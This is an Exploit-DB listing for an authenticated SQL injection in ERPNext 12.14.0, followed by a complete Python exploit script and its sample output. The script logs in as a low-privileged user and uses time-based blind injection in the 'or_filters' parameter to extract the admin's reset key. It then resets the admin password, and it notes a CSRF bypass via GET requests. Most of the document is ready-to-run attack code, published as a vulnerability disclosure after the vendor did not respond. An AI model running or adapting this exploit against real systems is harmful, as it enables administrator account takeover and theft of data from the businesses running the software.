ERPNext 12.14.0 - SQL Injection (Authenticated)

EDB-ID:

49464

CVE:

N/A


Author:

Hodorsec

Type:

webapps


Platform:

Multiple

Date:

2021-01-22


# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
# Date: 21-01-21
# Exploit Author: Hodorsec
# Vendor Homepage: http://erpnext.org
# Software Link: https://erpnext.org/download
# Version: 12.14.0
# Tested on: Ubuntu 18.04

#!/usr/bin/python3

# AUTHENTICATED SQL INJECTION VULNERABILITY
# In short:
# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
#
# Longer story:
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
# Test environment:
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
# Cause:
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.

# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
# 1. Create account
# 1.a. Use update-password link for created user received via mail
# STEPS INCLUDED IN SCRIPT
# 1. Login using existing low-privileged account
# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
# 3. Retrieve reset key for admin user
# 4. Reset admin account using given password

# DEMONSTRATION
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py hodorhodor@nowhere.local passpass1234@ admin password123411111 http://192.168.252.8/ 2
# [*] Got an authenticated session, continue to perform SQL injection...
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
# admin@nowhere.local
# [*] Retrieved value 'admin@nowhere.local' for username 'admin' column 'name' in row 1
# [*] Sent reset request for 'admin@nowhere.local
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
# [+] Retrieved email 'admin@nowhere.local' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
# [+} RESETTED ACCOUNT 'admin@nowhere.local' WITH NEW PASSWORD 'password123=411111!
# 
# [+] Done!

import requests
import urllib3
import os
import sys
import re

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
timeout = 30

# Injection prefix and suffix
inj_prefix = "[\"select(sleep("
inj_suffix = "))))\"]"

# Decimal begin and end
dec_begin = 48
dec_end = 57

# ASCII char begin and end
ascii_begin = 32
ascii_end = 126

# Handle CTRL-C
def keyboard_interrupt():
    """Handles keyboardinterrupt exceptions"""
    print("\n\n[*] User requested an interrupt, exiting...")
    exit(0)

# Custom headers
def http_headers():
    headers = {
        'User-Agent': "Mozilla",
    }
    return headers

# Get an authenticated session

def get_session(url,headers,email,password):
    data = {'cmd':'login',
            'usr':email,
            'pwd':password,
            'device':'desktop'}
    session = requests.session()
    r = session.post(url,headers=headers,data=data,timeout=timeout,=
allow_redirects=True,verify=False)
    if "full_name" in r.text:
        return session
    else:
        print("[!] Unable to get an authenticated session, check credentials...")
        exit(-1)

# Perform the SQLi call for injection
def sqli(url,session,headers,inj_str,sleep):
    comment_inj_str = re.sub(" ","+",inj_str)
    inj_params = {'cmd':'frappe.model.db_query.get_list',
                'filters':'["idx=1"]',
                'or_filters':inj_str,
                'fields':'idx',
                'doctype':'Report',
                'order_by':'idx',
                'group_by':'idx'}

    # inj_params[param] = comment_inj_str
    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
ms.items())
   =20
    # Do GET
    r = session.get(url,params=inj_params,headers=headers,timeout=t=
imeout,verify=False)
    res = r.elapsed.total_seconds()
    if res >= sleep:
        return True
    elif res < sleep:
        return False
    else:
        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
        exit(-1)

# Loop through positions and characters
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
    extracted = ""
    max_pos_len = 35
    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    for pos in range(1,max_pos_len):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
+ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
        if not sqli(url,session,headers,inj_str,sleep):
            break
        # Loop through ASCII printable characters
        direction = "="
        for guess in range(ascii_begin,ascii_end+1):
            extracted_char = chr(guess)
            inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
            if sqli(url,session,headers,inj_str,sleep):
                extracted += chr(guess)
                print(extracted_char,end='',flush=True)
                break
    return extracted


def forgot_password(url,headers,sqli_email):
    data = {'cmd':'frappe.core.doctype.user.user.reset_password',
            'user':sqli_email}
    r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
    if "Password reset instructions have been sent to your email" in r.text=
:
        return r

def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
    data = {'key':sqli_reset_key,
            'old_password':'',
            'new_password':new_password,
            'logout_all_sessions':'0',
            'cmd':'frappe.core.doctype.user.user.update_password'}
    r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
    if r.status_code == 200:
        return r

# Main
def main(argv):
    if len(sys.argv) == 7:
        email = sys.argv[1]
        password = sys.argv[2]
        username = sys.argv[3]
        new_password = sys.argv[4]
        url = sys.argv[5]
        sleep = int(sys.argv[6])
    else:
        print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
        print("[*] Example: " + sys.argv[0] + " hodorhodor@nowhere.local passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
        exit(0)

    # Random headers
    headers = http_headers()

    # Sleep divide by 2 due to timing caused by specific DBMS query
    sleep = sleep / 2

    # Optional prefix / suffix
    prefix = ""
    suffix = ""

    # Tables / columns / values
    table = 'tabUser'
    columns = ['name','reset_password_key']
    sqli_email = ""
    sqli_reset_key = ""

    # Rows
    rows = 1

    # Do stuff
    try:
        # Get an authenticated session
        session = get_session(url,headers,email,password)
        if session:
            print("[*] Got an authenticated session, continue to perform SQL injection...")
           =20
        # Getting values for found rows in specified columns
        for column in columns:
            print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
            for row in range(0,rows):
                retrieved = get_data(url,session,headers,prefix,suffix,ro=
w,column,table,username,sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
            if column == 'name':
                sqli_email = retrieved
                # Generate a reset token in database
                if forgot_password(url,headers,sqli_email):
                    print("[*] Sent reset request for '" + sqli_email + "'"=
)
                else:
                    print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
                    exit(-1)
            elif column == 'reset_password_key':
                sqli_reset_key = retrieved

        # Print retrieved values
        print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
sqli_reset_key + "'")

        # Reset the desired account
        if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
):
            print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
        else:
            print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
            exit(-1)
       =20
        # Done
        print("\n[+] Done!\n")
    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        exit(-1)
    except requests.exceptions.HTTPError as e:
        print("[!] Failed with error code - " + str(e.code) + "\n")
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()
        exit(-1)

# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])
   
# Timeline:
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
# 21-01-21: No response received, public disclosure